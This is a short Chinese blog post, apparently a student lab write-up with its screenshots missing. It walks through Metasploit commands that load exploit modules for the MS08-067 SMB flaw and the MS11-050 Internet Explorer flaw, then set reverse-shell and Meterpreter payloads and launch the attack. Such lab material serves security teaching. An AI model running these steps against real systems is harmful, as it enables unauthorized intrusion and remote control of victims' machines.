标签:序列号 成功 分享 window xpl 序列 查询 ref 中文
msfconsole
进入msf,再用search ms08_067
查询一下针对该漏洞的攻击模块:use exploit/windows/smb/ms08_067_netapi
使用该模块:show targets
查看可以被攻击的靶机的操作系统型号:show payloads
查看可以供我们使用的攻击载荷:generic/shell_reverse_tcp
,用set payload generic/shell_reverse_tcp
设置payload:show options
查看需要设置的参数:set 需设置的参数名 参数值
命令即可设置:show options
确认需要设置的参数是否已经设置好:exploit
指令开始攻击:用search ms11_050
查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement
使用该模块:
info
查看该模块的信息(这个指令相当于show targets
、show options
等的集合版):基本信息:
set payload windows/meterpreter/reverse_tcp
设置payload,并设置需要设置的参数。用show options
确认需要设置的参数是否已经设置好:
标签:序列号 成功 分享 window xpl 序列 查询 ref 中文
原文地址:https://www.cnblogs.com/20155305ql/p/8820504.html